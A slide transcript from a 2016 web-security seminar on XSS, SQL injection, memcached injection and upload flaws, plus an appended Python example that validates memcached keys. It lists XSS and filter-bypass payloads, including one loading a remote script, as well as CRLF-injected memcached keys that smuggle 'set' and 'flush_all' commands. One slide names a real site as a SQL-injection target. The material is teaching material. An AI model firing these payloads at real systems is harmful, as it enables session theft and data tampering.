
Web Application Security (Akademik Bilişim 2016)


The slides of the seminar I gave at Aydın Adnan Menderes University as part of the Akademik Bilişim 2016 event.


  1. Web Application Security, Akademik Bilişim 2016, Ömer Çıtak
  2. #! whoami Full-Stack Developer @ Cydets Inc. development && security www.omercitak.com Social : @Om3rCitak
  3. #! cat index • Cross-site Scripting (XSS) • SQL Injection • Memcache Injection • Upload Authentication
  4. #! ping-pong.jpg
  5. #! dont-trust-anyone.jpg
  6. #! cross-site-scripting • Reflected XSS • DOM Based XSS • Stored XSS
  7. #! reflected-xss.jpg
  8. #! reflected-xss-poc.jpg
  9. #! dom-based-xss.jpg
  10. #! stored-xss.jpg
  11. #! stored-xss-poc.jpg
  12. #! stored-xss-poc.jpg
  13. #! cat classic-xss-payloads • <script>alert(1)</script> • <img src="javascript:alert('XSS');"> • <IFRAME SRC="javascript:alert('XSS');"></IFRAME> • <SCRIPT a=">" SRC="http://omercitak.com/xss.js"></SCRIPT> • <video src=1 onerror=alert(1)> • <audio src=1 onerror=alert(1)> • <img src=x onerror=alert(1)">
  14. #! cat xss-bypass-payloads • <scrscriptipt>alalertert(1)</scrscriptipt> • alert(String.fromCharCode(88,83,83)) • <IMG SRC=j&#97…………….')> • <IMG SRC='vbscript:msgbox("XSS")'>
  15. #! xss-protection-1.jpg • Strip Tags – http://php.net/manual/tr/function.strip-tags.php
  16. #! xss-protection-2.jpg • HTML Special Chars – http://php.net/manual/tr/function.htmlspecialchars.php
  17. #! xss-protection-3.jpg • HttpOnly Cookies (session_set_cookie_params)
  18. #! xss-protection-4.jpg
  19. #! xss-protection-4.jpg
  20. #! xss-demo.jpg
  21. #! sql-injection • Union Based SQL Injection • Blind SQL Injection • Time Based SQL Injection
  22. #! union-based-sql-injection.jpg
  23. #! sql-injection-login-bypass.jpg
  24. #! cat blind-sql-injection • What if the errors are hidden? (error_reporting(0)) • What if the mysql_* functions have been prefixed with «@»?
  25. #! blind-sql-injection.jpg Boss, won't the Creator ask you on the other side why you didn't try Blind Injection?
  26. #! blind-sql-injection.jpg
  27. #! blind-sql-injection-poc.jpg
  28. #! blind-sql-injection-poc.jpg
  29. #! cat time-based-sql-injection • What if a query that produces no output is running in the background? – Count Query – Update Query – Insert Query – Delete Query – Relationship Query
  30. #! time-based-sql-injection.jpg
  31. #! time-based-sql-injection.jpg MySQL Server Microsoft SQL Server Oracle Server
  32. #! sql-injection-poc.jpg Amnesty International (amnesty.org.tr)
  33. #! sql-injection-poc.jpg
  34. #! sql-injection-demo.jpg
  35. #! memcache-injection
  36. #! using-memcache.jpg
  37. #! phpstorm memcached.php
  38. #! telnet 127.0.0.1 11211 > set key 0 10 5 > value < STORED > get key < VALUE key 0 5 < value < END
  39. #! phpstorm memcached.php
  40. #! phpstorm memcached.php
  41. #! phpstorm memcached.php
  42. #! phpstorm memcached.php
  43. #! phpstorm memcached.php ?key=omer 0 10 6 \r\n hacked \r\n • urlencode(‘\r’) = %0d • urlencode(‘\n’) = %0a ?key=omer 0 10 6 %0d%0a hacked %0d%0a
  44. #! phpstorm memcached.php > set omer 0 3600 6 > hacked < STORED > 123456 < ERROR
  45. #! phpstorm memcached.php ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a ?key=aaaaa…(251) flush_all %0d%0a
  46. #! cat vulnerable-libraries Python : Python-pylibmc Php : Memcached Asp.Net : memcacheddotnetproject (1.1.5) Java : com.meetup.memcached
  47. #! cat safe_libraries Python : python-memcache Php : memcache Java : java.net.spy.memcached
  48. #! cat using-memcached-library Wordpress Joomla 3.2.2 Piwik 2.1.0 MODX Revolution 2.3
  49. #! ascii-table.jpg
  50. #! phpstorm memcached.php
  51. #! upload-authentication
  52. #! upload-authentication-poc
  53. #! wget questions
  54. #! exit Thanks <3 www.omercitak.com Social : @Om3rCitak
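An added example, not from the slides or the presenter's memcached.php, of what the memcache-injection slides (43 to 45) describe: a memcached text-protocol `set` built by concatenating a user-controlled key, next to a key validator that rejects whitespace, control bytes and over-length keys before anything reaches the socket. The function and constant names are my own; the sample keys are constructed, URL-decoded forms of the `?key=` payloads shown on those slides.

```python
import re

MAX_KEY_LEN = 250  # key length limit of the memcached text protocol

# Text-protocol keys may contain no whitespace or control characters: a space
# ends the key token and CR/LF ends the command line (the %0d%0a trick).
_BAD_KEY_BYTES = re.compile(rb"[\x00-\x20\x7f]")


def is_safe_memcached_key(key: str) -> bool:
    """True only if `key` can be pasted into a text-protocol command verbatim."""
    raw = key.encode("utf-8", errors="surrogateescape")
    if not raw or len(raw) > MAX_KEY_LEN:
        return False
    return _BAD_KEY_BYTES.search(raw) is None


def naive_set_command(key: str, value: bytes, exptime: int = 3600) -> bytes:
    """The unsafe construction: the user-supplied key is concatenated as-is."""
    header = f"set {key} 0 {exptime} {len(value)}\r\n".encode("utf-8")
    return header + value + b"\r\n"


def safe_set_command(key: str, value: bytes, exptime: int = 3600) -> bytes:
    """Same command, but unsafe keys are rejected before touching the socket."""
    if not is_safe_memcached_key(key):
        raise ValueError("memcached key has whitespace/control bytes or is too long")
    return naive_set_command(key, value, exptime)


def protocol_lines(wire: bytes) -> list:
    """Split a buffer into the lines a memcached server parses one by one."""
    return [line for line in wire.split(b"\r\n") if line]


# Constructed inputs: URL-decoded versions of the ?key= payloads on the slides.
INJECTED_KEY = "omer 0 3600 6\r\nhacked\r\n"            # smuggles a second command
OVERLONG_KEY = "a" * 251 + " flush_all\r\n"             # beyond the 250-byte limit
NUL_KEY = "a\x00 set yenikey 0 3600 6\r\nhacked\r\n"    # NUL-byte variant

if __name__ == "__main__":
    # The naive build turns one 'set' into several server-parsed lines;
    # the validator refuses the same key outright.
    print(protocol_lines(naive_set_command(INJECTED_KEY, b"123456")))
    print(is_safe_memcached_key(INJECTED_KEY), is_safe_memcached_key("omer"))
```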
